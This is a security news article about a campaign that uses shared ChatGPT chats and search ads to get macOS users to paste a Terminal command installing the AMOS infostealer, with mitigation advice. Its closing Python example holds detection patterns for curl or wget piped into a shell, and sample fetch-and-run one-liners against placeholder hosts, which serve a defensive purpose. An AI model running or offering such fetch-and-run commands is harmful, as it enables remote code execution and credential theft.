ChatGPT share feature abused to spread Atomic macOS Stealer

Wednesday 10 December 2025 - 13:20
Cybercriminals are weaponizing ChatGPT’s chat sharing feature in a new campaign that installs Atomic macOS Stealer, also known as AMOS, on Apple computers while posing as a guide to a fake “Atlas browser” for macOS. The operation targets a broad audience of macOS users and cybersecurity-conscious professionals who rely on search engines and official-looking resources to discover new tools and troubleshoot technical issues.

How the ChatGPT share feature is abused

Security analysts report that attackers are publishing polished installation guides for a nonexistent Atlas browser as shared conversations hosted on the official chatgpt.com domain. These shared chats are stripped of suspicious context and presented as legitimate step-by-step instructions, making them appear trustworthy to users who reach them via search.

To drive traffic, the threat actors buy Google ads targeting terms such as “chatgpt atlas,” sending users to chatgpt.com/share URLs that look indistinguishable from genuine OpenAI content. Once on the page, victims are told to copy a single command into the macOS Terminal, framed as a standard installation step for the supposed browser.

From one-line command to full system compromise

The command shown in the shared chat retrieves and runs a script hosted on the domain atlas-extension.com, which acts as the delivery mechanism for AMOS. The script repeatedly prompts the user for their macOS password and, once the correct credentials are provided, uses them to install the malware with elevated privileges and to set up persistence.

Researchers describe this social engineering method as a variation of the ClickFix technique, in which users are convinced to execute a command presented as a fix, update, or optimization rather than as a threat. In this case, curiosity around an apparently new ChatGPT-linked browser is used to override normal caution, especially among users accustomed to pasting commands from technical guides.

AMOS infostealer and its new persistent backdoor

Once installed, Atomic macOS Stealer focuses on harvesting sensitive data, including passwords, cookies, and autofill information from browsers such as Chrome and Firefox, as well as credentials and assets from cryptocurrency wallets including Electrum, Coinomi, and Exodus. The malware also searches Desktop, Documents, and Downloads folders for text, PDF, and DOCX files, and can capture session data from applications like Telegram Desktop and OpenVPN Connect.

Recent analysis shows newer AMOS variants ship with an integrated backdoor that gives attackers persistent, remote access to infected Macs even after reboots. Cybersecurity firm Moonlock notes this marks only the second globally scaled macOS backdoor operation after previous campaigns linked to North Korean groups, and warns that AMOS has already been detected in attacks across more than 120 countries, with the United States, France, Italy, the United Kingdom, and Canada among the most affected.

Global campaigns and blocked attacks

Threat intelligence reports describe AMOS as one of the most widespread macOS stealers currently in circulation, offered under a malware-as-a-service model to different criminal crews. These groups combine techniques such as malvertising, fake support pages, and now shared AI chats to lure victims into running single-line installation commands that bypass normal user skepticism and native security prompts.

CrowdStrike recently disclosed that its Falcon platform blocked more than 300 attempted intrusions between June and August 2025 involving SHAMOS, a variant of Atomic macOS Stealer developed by the cybercrime group Cookie Spider. Those campaigns relied heavily on fraudulent macOS help sites promoted via online advertising, illustrating how commercial off-the-shelf stealers like AMOS are being repeatedly repurposed and redistributed through evolving social engineering vectors.

Mitigation advice for macOS users

Security specialists stress that users should never execute Terminal commands copied from unverified chats, search results, or online guides, regardless of whether the content is hosted on a trusted domain. Experts recommend checking any unfamiliar one-line command with IT teams or by using independent analysis tools, and verifying software downloads through official vendor websites rather than search ads or intermediaries.
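As an illustration of the check recommended above, the following added example (not taken from the reporting or from any vendor tool) reviews a pasted one-line command before it is run and flags the ways a shell one-liner executes downloaded content without saving it first. It generalizes the fetch-and-run pattern described in this article to three common shell forms; the function name, the pattern labels, the `trusted_hosts` allowlist and all sample hosts are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit

# A shell interpreter, optionally behind sudo or an absolute path.
SHELLS = r"(?<![\w.-])(?:sudo\s+)?(?:/usr)?(?:/bin/)?(?:ba|z)?sh\b"
# Programs commonly used to download the script.
FETCH = r"\b(?:curl|wget)\b"

# Each pattern is one way a one-liner runs remote content in a single step.
PATTERNS = {
    "fetch piped to shell":
        re.compile(FETCH + r"[^|;]*\|\s*" + SHELLS),
    "fetch in command substitution":
        re.compile(SHELLS + r"\s+-c\s+[\"']?\$\(\s*" + FETCH),
    "fetch in process substitution":
        re.compile(SHELLS + r"\s+<\(\s*" + FETCH),
}
URL_RE = re.compile(r"https?://[^\s\"'<>()|;]+", re.I)


def review_command(command, trusted_hosts=()):
    """Return a list of findings for a pasted command; empty means nothing flagged.

    The execution-pattern findings do not depend on the host: a download that
    is executed immediately is reported even when it comes from an allowlisted
    vendor domain, because where the instructions are hosted says nothing
    about what the command fetches.
    """
    findings = [name for name, rx in PATTERNS.items() if rx.search(command)]
    for url in URL_RE.findall(command):
        host = (urlsplit(url).hostname or "").lower()
        # Match the allowlisted domain itself or a true subdomain of it.
        if not any(host == t or host.endswith("." + t) for t in trusted_hosts):
            findings.append("untrusted host: " + host)
    return findings


if __name__ == "__main__":
    # Constructed sample commands; the hosts are placeholders.
    samples = [
        "curl -fsSL https://downloads.example.invalid/install.sh | bash",
        '/bin/bash -c "$(curl -fsSL https://get.vendor.example/setup.sh)"',
        "brew install --cask firefox",
    ]
    for cmd in samples:
        print(cmd, "->", review_command(cmd, trusted_hosts=("vendor.example",)))
```

A command that produces any finding should go to an IT or security team for review rather than into the Terminal.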

Defenders advise macOS users, including professionals managing sensitive data or cryptocurrency assets, to run reputable endpoint protection capable of detecting AMOS and similar stealers, to keep systems and browsers updated, and to monitor for unusual access to accounts and wallets. Organizations are also encouraged to train staff about ClickFix-style tactics that disguise malicious commands as harmless fixes or productivity enhancements.